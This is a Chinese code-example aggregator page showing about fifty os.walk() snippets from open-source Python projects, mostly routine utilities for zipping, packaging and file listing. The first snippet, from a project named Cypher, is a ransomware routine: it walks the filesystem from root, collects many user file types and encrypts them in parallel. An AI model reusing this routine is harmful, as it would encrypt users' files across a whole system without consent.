Python os 模块,walk() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用os.walk()

项目:Cypher    作者:NullArray    | 项目源码 | 文件源码
def select_files():

    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv", 
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
       ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
       ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]

    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.append(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
项目:AutoML5    作者:djajetic    | 项目源码 | 文件源码
def zipdir(archivename, basedir):
    '''Zip directory, from J.F. Sebastian http://stackoverflow.com/'''
    assert os.path.isdir(basedir)
    with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
            #NOTE: ignore empty directories
            for fn in files:
                if fn[-4:]!='.zip':
                    absfn = os.path.join(root, fn)
                    zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path
                    z.write(absfn, zfn)

# ================ Inventory input data and create data structure =================
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def zip_dir(directory):
    """zip a directory tree into a BytesIO object"""
    result = io.BytesIO()
    dlen = len(directory)
    with ZipFile(result, "w") as zf:
        for root, dirs, files in os.walk(directory):
            for name in files:
                full = os.path.join(root, name)
                rel = root[dlen:]
                dest = os.path.join(rel, name)
                zf.write(full, dest)
    return result

#
# Simple progress bar
#
项目:pynini    作者:daffidilly    | 项目源码 | 文件源码
def load_data(self):
        # work in the parent of the pages directory, because we
        # want the filenames to begin "pages/...".
        chdir(dirname(self.setup.pages_dir))
        rel = relpath(self.setup.pages_dir)
        for root, dirs, files in walk(rel):
            for filename in files:
                start, ext = splitext(filename)
                if ext in self.setup.data_extensions:
                    #yield root, dirs, filename
                    loader = self.setup.data_loaders.get(ext)
                    path = join(root,filename)
                    if not loader:
                        raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, ext))

                    data_key = join(root, start)
                    loaded_dict = loader.loadf(path)
                    self.data[data_key] = loaded_dict

                    #self.setup.log.debug("data key [%s] ->" % (data_key, ), root, filename, ); pprint.pprint(loaded_dict, sys.stdout)

        #pprint.pprint(self.data, sys.stdout)
        #print("XXXXX data:", self.data)
项目:gimel    作者:Alephbet    | 项目源码 | 文件源码
def prepare_zip():
    from pkg_resources import resource_filename as resource
    from config import config
    from json import dumps
    logger.info('creating/updating gimel.zip')
    with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
        info = ZipInfo('config.json')
        info.external_attr = 0o664 << 16
        zipf.writestr(info, dumps(config))
        zipf.write(resource('gimel', 'config.py'), 'config.py')
        zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
        zipf.write(resource('gimel', 'logger.py'), 'logger.py')
        for root, dirs, files in os.walk(resource('gimel', 'vendor')):
            for file in files:
                real_file = os.path.join(root, file)
                relative_file = os.path.relpath(real_file,
                                                resource('gimel', ''))
                zipf.write(real_file, relative_file)
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def zipdir(path, zipn):
    for root, dirs, files in os.walk(path):
        for file in files:
            zipn.write(os.path.join(root, file))
项目:rstviewer    作者:arne-cl    | 项目源码 | 文件源码
def gen_data_files(src_dir):
    """
    generates a list of files contained in the given directory (and its
    subdirectories) in the format required by the ``package_data`` parameter
    of the ``setuptools.setup`` function.

    Parameters
    ----------
    src_dir : str
        (relative) path to the directory structure containing the files to
        be included in the package distribution

    Returns
    -------
    fpaths : list(str)
        a list of file paths
    """
    fpaths = []
    base = os.path.dirname(src_dir)
    for root, dir, files in os.walk(src_dir):
        if len(files) != 0:
            for f in files:
                fpaths.append(os.path.relpath(os.path.join(root, f), base))
    return fpaths
项目:Starfish    作者:BillWang139967    | 项目源码 | 文件源码
def clearpyc(root, patterns='*',single_level=False, yield_folders=False):
    """
    root: ??¼
    patterns ???????
    single_level: ???¼??
    yield_folders: ??¼??
    """
    patterns = patterns.split(';')
    for path, subdirs, files in os.walk(root):
        if yield_folders:
            files.extend(subdirs)
            files.sort()
        for name in files:
            for pattern in patterns:
                if fnmatch.fnmatch(name, pattern.strip()):# ?pattern???
                    yield os.path.join(path, name)
        if single_level:
            break
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, None)
                    if info:
                        result.add(info['name'])
            if not self.recursive:
                break
        return result
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def test_pydist():
    """Make sure pydist.json exists and validates against our schema."""
    # XXX this test may need manual cleanup of older wheels

    import jsonschema

    def open_json(filename):
        return json.loads(open(filename, 'rb').read().decode('utf-8'))

    pymeta_schema = open_json(resource_filename('wheel.test',
                                                'pydist-schema.json'))
    valid = 0
    for dist in ("simple.dist", "complex-dist"):
        basedir = pkg_resources.resource_filename('wheel.test', dist)
        for (dirname, subdirs, filenames) in os.walk(basedir):
            for filename in filenames:
                if filename.endswith('.whl'):
                    whl = ZipFile(os.path.join(dirname, filename))
                    for entry in whl.infolist():
                        if entry.filename.endswith('/metadata.json'):
                            pymeta = json.loads(whl.read(entry).decode('utf-8'))
                            jsonschema.validate(pymeta, pymeta_schema)
                            valid += 1
    assert valid > 0, "No metadata.json found"
项目:pynini    作者:daffidilly    | 项目源码 | 文件源码
def get_all_pages(self):
        # work in the parent of the pages directory, because we
        # want the filenames to begin "pages/...".
        chdir(dirname(self.setup.pages_dir))
        rel = relpath(self.setup.pages_dir)

        for root, dirs, files in walk(rel):  # self.config.pages_dir):

            # examples:
            #
            #  root='pages'              root='pages/categories'
            #  dirs=['categories']       dirs=[]
            #  files=['index.html']      files=['list.html']

            # self.setup.log.debug("\nTEMPLATE ROOT: %s" % root)
            # self.setup.log.debug("TEMPLATE DIRS: %s" % dirs)
            # self.setup.log.debug("TEMPLATE FILENAMES: %s" % files)
            # #dir_context = global_context.new_child(data_tree[root])

            for filename in files:
                start, ext = splitext(filename)
                if ext in self.setup.template_extensions:
                    # if filename.endswith(".html"):  # TODO: should this filter be required at all?
                    yield Page(self.setup, filename, join(root, filename))
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, None)
                    if info:
                        result.add(info['name'])
            if not self.recursive:
                break
        return result
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def zip_dir(directory):
    """zip a directory tree into a BytesIO object"""
    result = io.BytesIO()
    dlen = len(directory)
    with ZipFile(result, "w") as zf:
        for root, dirs, files in os.walk(directory):
            for name in files:
                full = os.path.join(root, name)
                rel = root[dlen:]
                dest = os.path.join(rel, name)
                zf.write(full, dest)
    return result

#
# Simple progress bar
#
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
    """"Unpack" a directory, using the same interface as for archives

    Raises ``UnrecognizedFormat`` if `filename` is not a directory
    """
    if not os.path.isdir(filename):
        raise UnrecognizedFormat("%s is not a directory" % filename)

    paths = {
        filename: ('', extract_dir),
    }
    for base, dirs, files in os.walk(filename):
        src, dst = paths[base]
        for d in dirs:
            paths[os.path.join(base, d)] = src + d + '/', os.path.join(dst, d)
        for f in files:
            target = os.path.join(dst, f)
            target = progress_filter(src + f, target)
            if not target:
                # skip non-files
                continue
            ensure_directory(target)
            f = os.path.join(base, f)
            shutil.copyfile(f, target)
            shutil.copystat(f, target)
项目:picoCTF    作者:picoCTF    | 项目源码 | 文件源码
def find_problems(problem_path):
    """
    Find all problems that exist under the given root.
    We consider any directory with a problem.json to be an intended problem directory.

    Args:
        problem_path: the problem directory
    Returns:
        A list of problem paths returned from get_problem.
    """

    problem_paths = []

    for root, _, files in os.walk(problem_path):
        if "problem.json" in files and "__staging" not in root:
            problem_paths.append(root)

    return problem_paths
项目:picoCTF    作者:picoCTF    | 项目源码 | 文件源码
def files_from_directory(directory, recurse=True, permissions=0o664):
    """
    Returns a list of File objects for every file in a directory. Can recurse optionally.

    Args:
        directory: The directory to add files from
        recurse: Whether or not to recursively add files. Defaults to true
        permissions: The default permissions for the files. Defaults to 0o664.
    """

    result = []

    for root, dirnames, filenames in os.walk(directory):
        for filename in filenames:
            result.append(File(join(root, filename), permissions))
        if not recurse:
            break

    return result
项目:polyaxon-cli    作者:polyaxon    | 项目源码 | 文件源码
def get_unignored_file_paths(cls, ignore_list=None, white_list=None):
        config = cls.get_config()
        ignore_list = ignore_list or config[0]
        white_list = white_list or config[1]
        unignored_files = []

        for root, dirs, files in os.walk("."):
            logger.debug("Root:%s, Dirs:%s", root, dirs)

            if cls._ignore_path(unix_style_path(root), ignore_list, white_list):
                dirs[:] = []
                logger.debug("Ignoring directory : %s", root)
                continue

            for file_name in files:
                file_path = unix_style_path(os.path.join(root, file_name))
                if cls._ignore_path(file_path, ignore_list, white_list):
                    logger.debug("Ignoring file : %s", file_name)
                    continue

                unignored_files.append(os.path.join(root, file_name))

        return unignored_files
项目:core-framework    作者:RedhawkSDR    | 项目源码 | 文件源码
def __processDir(self):
        """
        Looks for Makefiles in the given directory and all the sub-directories
        if recursive is set to true
        """
        self.__log("Processing directory %s" % self.__tgt)  

        # if recurse, then use walk otherwise do current directory only
        if self.__recurse:
            for (path, dirs, files) in os.walk(self.__tgt):
                for curr_file in files:
                    # if the file is a Makefile added to process
                    if curr_file == __PATTERN__:
                        fname = os.path.join(path, curr_file)
                        self.__make_files.append(fname)
                        self.__log("Adding %s to list" % fname)
        else:
            # just care to find Makefiles in this directory
            files = os.listdir(self.__tgt)
            if __PATTERN__ in files:
                fname = os.path.join(self.__tgt, __PATTERN__)
                self.__log("Appending %s to the list" % fname)
                self.__make_files.append(fname)
项目:mysql-er    作者:StefanLim0    | 项目源码 | 文件源码
def get_sqls(self):
        """This function extracts sqls from the java files with mybatis sqls.

        Returns:
           A list of :class:`SQL`. For example:
           [SQL('', u'select a.id, b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')]

        """
        sqls = []
        for root, dirs, files in os.walk(self.dir):
            for file in files:
                if not file.endswith('.java'):
                    continue
                with codecs.open(os.path.join(root, file), 'r', encoding=self.encoding) as f:
                    sqls.extend(MybatisInlineSqlExtractor.get_selects_from_text(MybatisInlineSqlExtractor.remove_comment(f.read())))
        return sqls
项目:kinect-2-libras    作者:inessadl    | 项目源码 | 文件源码
def refactor_dir(self, dir_name, write=False, doctests_only=False):
        """Descends down a directory and refactor every Python file found.

        Python files are assumed to have a .py extension.

        Files and subdirectories starting with '.' are skipped.
        """
        py_ext = os.extsep + "py"
        for dirpath, dirnames, filenames in os.walk(dir_name):
            self.log_debug("Descending into %s", dirpath)
            dirnames.sort()
            filenames.sort()
            for name in filenames:
                if (not name.startswith(".") and
                    os.path.splitext(name)[1] == py_ext):
                    fullname = os.path.join(dirpath, name)
                    self.refactor_file(fullname, write, doctests_only)
            # Modify dirnames in-place to remove subdirs with leading dots
            dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
项目:kinect-2-libras    作者:inessadl    | 项目源码 | 文件源码
def remove_folder(self, folder):
        """Delete the named folder, which must be empty."""
        path = os.path.join(self._path, '.' + folder)
        for entry in os.listdir(os.path.join(path, 'new')) + \
                     os.listdir(os.path.join(path, 'cur')):
            if len(entry) < 1 or entry[0] != '.':
                raise NotEmptyError('Folder contains message(s): %s' % folder)
        for entry in os.listdir(path):
            if entry != 'new' and entry != 'cur' and entry != 'tmp' and \
               os.path.isdir(os.path.join(path, entry)):
                raise NotEmptyError("Folder contains subdirectory '%s': %s" %
                                    (folder, entry))
        for root, dirs, files in os.walk(path, topdown=False):
            for entry in files:
                os.remove(os.path.join(root, entry))
            for entry in dirs:
                os.rmdir(os.path.join(root, entry))
        os.rmdir(path)
项目:conv2mp4-py    作者:Kameecoding    | 项目源码 | 文件源码
def find_media_files(media_path):
    unconverted = []

    for dirname, directories, files in os.walk(media_path):
        for file in files:
            #skip hidden files
            if file.startswith('.'):
                continue

            if is_video(file) or is_subtitle(file):
                file = os.path.join(dirname, file)
                #Skip Sample files             
                if re.search(".sample.",file,re.I):
                    continue        

                unconverted.append(file)

    sorted_unconvered =  sorted(unconverted)

    return sorted_unconvered
项目:bnn-analysis    作者:myshkov    | 项目源码 | 文件源码
def get_latest_data_subdir(pattern=None, take=-1):
    def get_date(f):
        return os.stat(os.path.join(BASE_DATA_DIR, f)).st_mtime

    try:
        dirs = next(os.walk(BASE_DATA_DIR))[1]
    except StopIteration:
        return None

    if pattern is not None:
        dirs = (d for d in dirs if pattern in d)

    dirs = list(sorted(dirs, key=get_date))
    if len(dirs) == 0:
        return None

    return dirs[take]
项目:conv2mp4-py    作者:BrianDMG    | 项目源码 | 文件源码
def garbage_collection():
    global garbage_count, garbage_list
    garbage_count = 0
    garbage_list = ''
    for root, dirs, targets in os.walk(media_path):
        for target_name in targets:
            if target_name.endswith(garbage):
                garbage_count += 1
                fullpath = os.path.normpath(os.path.join(str(root), str(target_name)))
                garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath)
                os.remove(fullpath)
    if garbage_count == 0:
        print ("\nGarbage Collection: There was no garbage found!")
    elif garbage_count == 1:
        print ("\nGarbage Collection: The following file was deleted:")
    else:
        print ("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:")
    print garbage_list


# Log various session statistics
项目:dogs-vs-cats    作者:yaricom    | 项目源码 | 文件源码
def list_image(root, recursive, exts):
    i = 0
    if recursive:
        cat = {}
        for path, dirs, files in os.walk(root, followlinks=True):
            dirs.sort()
            files.sort()
            for fname in files:
                fpath = os.path.join(path, fname)
                suffix = os.path.splitext(fname)[1].lower()
                if os.path.isfile(fpath) and (suffix in exts):
                    if path not in cat:
                        cat[path] = len(cat)
                    yield (i, os.path.relpath(fpath, root), cat[path])
                    i += 1
        for k, v in sorted(cat.items(), key=lambda x: x[1]):
            print(os.path.relpath(k, root), v)
    else:
        for fname in sorted(os.listdir(root)):
            fpath = os.path.join(root, fname)
            suffix = os.path.splitext(fname)[1].lower()
            if os.path.isfile(fpath) and (suffix in exts):
                yield (i, os.path.relpath(fpath, root), 0)
                i += 1
项目:pyseeder    作者:PurpleI2P    | 项目源码 | 文件源码
def reseed(self, netdb):
        """Compress netdb entries and set content"""
        zip_file = io.BytesIO()
        dat_files = []

        for root, dirs, files in os.walk(netdb):
            for f in files:
                if f.endswith(".dat"):
                    # TODO check modified time
                    # may be not older than 10h
                    dat_files.append(os.path.join(root, f))

        if len(dat_files) == 0:
            raise PyseederException("Can't get enough netDb entries")
        elif len(dat_files) > 75:
            dat_files = random.sample(dat_files, 75)

        with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf:
            for f in dat_files: 
                zf.write(f, arcname=os.path.split(f)[1])

        self.FILE_TYPE = 0x00
        self.CONTENT_TYPE = 0x03
        self.CONTENT = zip_file.getvalue()
        self.CONTENT_LENGTH = len(self.CONTENT)
项目:QUANTAXIS    作者:yutiansut    | 项目源码 | 文件源码
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client):
    reader = TdxMinBarReader()
    __coll = client.quantaxis.stock_min_five
    for a, v, files in os.walk(file_dir):

        for file in files:

            if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \
                (str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \
                    (str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):

                QA_util_log_info('Now_saving ' + str(file)
                                 [2:8] + '\'s 5 min tick')
                fname = file_dir + '\\' + file
                df = reader.get_df(fname)
                df['code'] = str(file)[2:8]
                df['market'] = str(file)[0:2]
                df['datetime'] = [str(x) for x in list(df.index)]
                df['date'] = [str(x)[0:10] for x in list(df.index)]
                df['time_stamp'] = df['datetime'].apply(
                    lambda x: QA_util_time_stamp(x))
                df['date_stamp'] = df['date'].apply(
                    lambda x: QA_util_date_stamp(x))
                data_json = json.loads(df.to_json(orient='records'))
                __coll.insert_many(data_json)
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, None)
                    if info:
                        result.add(info['name'])
            if not self.recursive:
                break
        return result
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def zip_dir(directory):
    """zip a directory tree into a BytesIO object"""
    result = io.BytesIO()
    dlen = len(directory)
    with ZipFile(result, "w") as zf:
        for root, dirs, files in os.walk(directory):
            for name in files:
                full = os.path.join(root, name)
                rel = root[dlen:]
                dest = os.path.join(rel, name)
                zf.write(full, dest)
    return result

#
# Simple progress bar
#
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def create_zipfile(self, filename):
        zip_file = zipfile.ZipFile(filename, "w")
        try:
            self.mkpath(self.target_dir)  # just in case
            for root, dirs, files in os.walk(self.target_dir):
                if root == self.target_dir and not files:
                    raise DistutilsOptionError(
                        "no files found in upload directory '%s'"
                        % self.target_dir)
                for name in files:
                    full = os.path.join(root, name)
                    relative = root[len(self.target_dir):].lstrip(os.path.sep)
                    dest = os.path.join(relative, name)
                    zip_file.write(full, dest)
        finally:
            zip_file.close()
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
    """"Unpack" a directory, using the same interface as for archives

    Raises ``UnrecognizedFormat`` if `filename` is not a directory
    """
    if not os.path.isdir(filename):
        raise UnrecognizedFormat("%s is not a directory" % (filename,))

    paths = {filename:('',extract_dir)}
    for base, dirs, files in os.walk(filename):
        src,dst = paths[base]
        for d in dirs:
            paths[os.path.join(base,d)] = src+d+'/', os.path.join(dst,d)
        for f in files:
            name = src+f
            target = os.path.join(dst,f)
            target = progress_filter(src+f, target)
            if not target:
                continue    # skip non-files
            ensure_directory(target)
            f = os.path.join(base,f)
            shutil.copyfile(f, target)
            shutil.copystat(f, target)
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def ensure_init(path):
    '''
    ensure directories leading up to path are importable, omitting
    parent directory, eg path='/hooks/helpers/foo'/:
        hooks/
        hooks/helpers/__init__.py
        hooks/helpers/foo/__init__.py
    '''
    for d, dirs, files in os.walk(os.path.join(*path.split('/')[:2])):
        _i = os.path.join(d, '__init__.py')
        if not os.path.exists(_i):
            logging.info('Adding missing __init__.py: %s' % _i)
            open(_i, 'wb').close()
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def chownr(path, owner, group, follow_links=True, chowntopdir=False):
    """Recursively change user and group ownership of files and directories
    in given path. Doesn't chown path itself by default, only its children.

    :param str path: The string path to start changing ownership.
    :param str owner: The owner string to use when looking up the uid.
    :param str group: The group string to use when looking up the gid.
    :param bool follow_links: Also Chown links if True
    :param bool chowntopdir: Also chown path itself if True
    """
    uid = pwd.getpwnam(owner).pw_uid
    gid = grp.getgrnam(group).gr_gid
    if follow_links:
        chown = os.chown
    else:
        chown = os.lchown

    if chowntopdir:
        broken_symlink = os.path.lexists(path) and not os.path.exists(path)
        if not broken_symlink:
            chown(path, uid, gid)
    for root, dirs, files in os.walk(path):
        for name in dirs + files:
            full = os.path.join(root, name)
            broken_symlink = os.path.lexists(full) and not os.path.exists(full)
            if not broken_symlink:
                chown(full, uid, gid)
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def get_dir_size(start_path = '.'):
    total_size = 0
    for dirpath, dirnames, filenames in os.walk(start_path):
        for f in filenames:
            fp = os.path.join(dirpath, f)
            total_size += os.path.getsize(fp)
    return total_size
项目:PhonePerformanceMeasure    作者:KyleCe    | 项目源码 | 文件源码
def get_apk_file_in_path(path):
    apk_map = []
    for parent, dir_names, filenames in os.walk(path):
        for f in filenames:
            if f.endswith(Res.pgk_suffix):
                apk_map.append(os.path.join(parent, f))
    return apk_map
项目:Switch-Screenshots    作者:RenanGreca    | 项目源码 | 文件源码
def list_images(dir):
    r = []
    for root, dirs, files in os.walk(dir):
        for name in files:
            if "jpg" in name or "mp4" in name:
                r.append(os.path.join(root, name))
    return r

# Load game IDs file
项目:django-notifs    作者:danidee10    | 项目源码 | 文件源码
def package_files(directory):
    """Recursively add subfolders and files."""
    paths = []
    for (path, directories, filenames) in os.walk(directory):
        for filename in filenames:
            paths.append(os.path.join('..', path, filename))
    return paths
项目:xr-telemetry-m2m-web    作者:cisco    | 项目源码 | 文件源码
def maybe_load_scriptlets(cfg):
    if scriptlets is not None:
        return
    global scriptlets
    scriptlets = OrderedDict()
    scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets')
    for root, dirs, files in os.walk(scriptlet_dir):
        for filename in files:
            contents = open(os.path.join(root, filename)).read()
            m = re.search('_(.*)\.py', filename)
            if m:
                filename = m.group(1)
            scriptlets[filename] = contents
项目:xr-telemetry-m2m-web    作者:cisco    | 项目源码 | 文件源码
def maybe_load_policies(cfg, policies_dict):
    # Update policies_dict with files found in /src/assets/policies
    policy_dir = os.path.join(cfg['assets'], 'policies')
    for root, dirs, files in os.walk(policy_dir):
        for filename in files:
            contents = open(os.path.join(root, filename)).read()
            policies_dict[filename] = contents
    return policies_dict
项目:xr-telemetry-m2m-web    作者:cisco    | 项目源码 | 文件源码
def __init__(self, cfg):
        static_dir = os.path.join(cfg['assets'], 'static')
        self.files = {}
        for root, dirs, files in os.walk(static_dir):
            for filename in files:
                if not filename.startswith('!'):
                    fullpath = os.path.join(root, filename)
                    self.files[filename] = File(fullpath)
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _get_project(self, name):
        result = {'urls': {}, 'digests': {}}
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, name)
                    if info:
                        self._update_version_data(result, info)
            if not self.recursive:
                break
        return result
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _iglob(path_glob):
    rich_path_glob = RICH_GLOB.split(path_glob, 1)
    if len(rich_path_glob) > 1:
        assert len(rich_path_glob) == 3, rich_path_glob
        prefix, set, suffix = rich_path_glob
        for item in set.split(','):
            for path in _iglob(''.join((prefix, item, suffix))):
                yield path
    else:
        if '**' not in path_glob:
            for item in std_iglob(path_glob):
                yield item
        else:
            prefix, radical = path_glob.split('**', 1)
            if prefix == '':
                prefix = '.'
            if radical == '':
                radical = '*'
            else:
                # we support both
                radical = radical.lstrip('/')
                radical = radical.lstrip('\\')
            for path, dir, files in os.walk(prefix):
                path = os.path.normpath(path)
                for fn in _iglob(os.path.join(path, radical)):
                    yield fn
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def write_record(self, bdist_dir, distinfo_dir):
        from wheel.util import urlsafe_b64encode

        record_path = os.path.join(distinfo_dir, 'RECORD')
        record_relpath = os.path.relpath(record_path, bdist_dir)

        def walk():
            for dir, dirs, files in os.walk(bdist_dir):
                dirs.sort()
                for f in sorted(files):
                    yield os.path.join(dir, f)

        def skip(path):
            """Wheel hashes every possible file."""
            return (path == record_relpath)

        with open_for_csv(record_path, 'w+') as record_file:
            writer = csv.writer(record_file)
            for path in walk():
                relpath = os.path.relpath(path, bdist_dir)
                if skip(relpath):
                    hash = ''
                    size = ''
                else:
                    with open(path, 'rb') as f:
                        data = f.read()
                    digest = hashlib.sha256(data).digest()
                    hash = 'sha256=' + native(urlsafe_b64encode(digest))
                    size = len(data)
                record_path = os.path.relpath(
                    path, bdist_dir).replace(os.path.sep, '/')
                writer.writerow((record_path, hash, size))
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def test_no_scripts():
    """Make sure entry point scripts are not generated."""
    dist = "complex-dist"
    basedir = pkg_resources.resource_filename('wheel.test', dist)
    for (dirname, subdirs, filenames) in os.walk(basedir):
        for filename in filenames:
            if filename.endswith('.whl'):
                whl = ZipFile(os.path.join(dirname, filename))
                for entry in whl.infolist():
                    assert not '.data/scripts/' in entry.filename
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def get_ext_outputs(self):
        """Get a list of relative paths to C extensions in the output distro"""

        all_outputs = []
        ext_outputs = []

        paths = {self.bdist_dir: ''}
        for base, dirs, files in os.walk(self.bdist_dir):
            for filename in files:
                if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS:
                    all_outputs.append(paths[base] + filename)
            for filename in dirs:
                paths[os.path.join(base, filename)] = (paths[base] +
                                                       filename + '/')

        if self.distribution.has_ext_modules():
            build_cmd = self.get_finalized_command('build_ext')
            for ext in build_cmd.extensions:
                if isinstance(ext, Library):
                    continue
                fullname = build_cmd.get_ext_fullname(ext.name)
                filename = build_cmd.get_ext_filename(fullname)
                if not os.path.basename(filename).startswith('dl-'):
                    if os.path.exists(os.path.join(self.bdist_dir, filename)):
                        ext_outputs.append(filename)

        return all_outputs, ext_outputs
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def walk_egg(egg_dir):
    """Walk an unpacked egg's contents, skipping the metadata directory"""
    walker = os.walk(egg_dir)
    base, dirs, files = next(walker)
    if 'EGG-INFO' in dirs:
        dirs.remove('EGG-INFO')
    yield base, dirs, files
    for bdf in walker:
        yield bdf
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
                 mode='w'):
    """Create a zip file from all the files under 'base_dir'.  The output
    zip file will be named 'base_dir' + ".zip".  Uses either the "zipfile"
    Python module (if available) or the InfoZIP "zip" utility (if installed
    and found on the default search path).  If neither tool is available,
    raises DistutilsExecError.  Returns the name of the output zip file.
    """
    import zipfile

    mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
    log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)

    def visit(z, dirname, names):
        for name in names:
            path = os.path.normpath(os.path.join(dirname, name))
            if os.path.isfile(path):
                p = path[len(base_dir) + 1:]
                if not dry_run:
                    z.write(path, p)
                log.debug("adding '%s'", p)

    compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
    if not dry_run:
        z = zipfile.ZipFile(zip_filename, mode, compression=compression)
        for dirname, dirs, files in os.walk(base_dir):
            visit(z, dirname, files)
        z.close()
    else:
        for dirname, dirs, files in os.walk(base_dir):
            visit(None, dirname, files)
    return zip_filename
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def add_output(self, path):
        if os.path.isdir(path):
            for base, dirs, files in os.walk(path):
                for filename in files:
                    self.outputs.append(os.path.join(base, filename))
        else:
            self.outputs.append(path)
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def create_zipfile(self, filename):
        zip_file = zipfile.ZipFile(filename, "w")
        try:
            self.mkpath(self.target_dir)  # just in case
            for root, dirs, files in os.walk(self.target_dir):
                if root == self.target_dir and not files:
                    tmpl = "no files found in upload directory '%s'"
                    raise DistutilsOptionError(tmpl % self.target_dir)
                for name in files:
                    full = os.path.join(root, name)
                    relative = root[len(self.target_dir):].lstrip(os.path.sep)
                    dest = os.path.join(relative, name)
                    zip_file.write(full, dest)
        finally:
            zip_file.close()
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _find_packages_iter(cls, where, exclude, include):
        """
        All the packages found in 'where' that pass the 'include' filter, but
        not the 'exclude' filter.
        """
        for root, dirs, files in os.walk(where, followlinks=True):
            # Copy dirs to iterate over it, then empty dirs.
            all_dirs = dirs[:]
            dirs[:] = []

            for dir in all_dirs:
                full_path = os.path.join(root, dir)
                rel_path = os.path.relpath(full_path, where)
                package = rel_path.replace(os.path.sep, '.')

                # Skip directory trees that are not valid packages
                if ('.' in dir or not cls._looks_like_package(full_path)):
                    continue

                # Should this package be included?
                if include(package) and not exclude(package):
                    yield package

                # Keep searching subdirectories, as there may be more packages
                # down there, even if the parent was excluded.
                dirs.append(dir)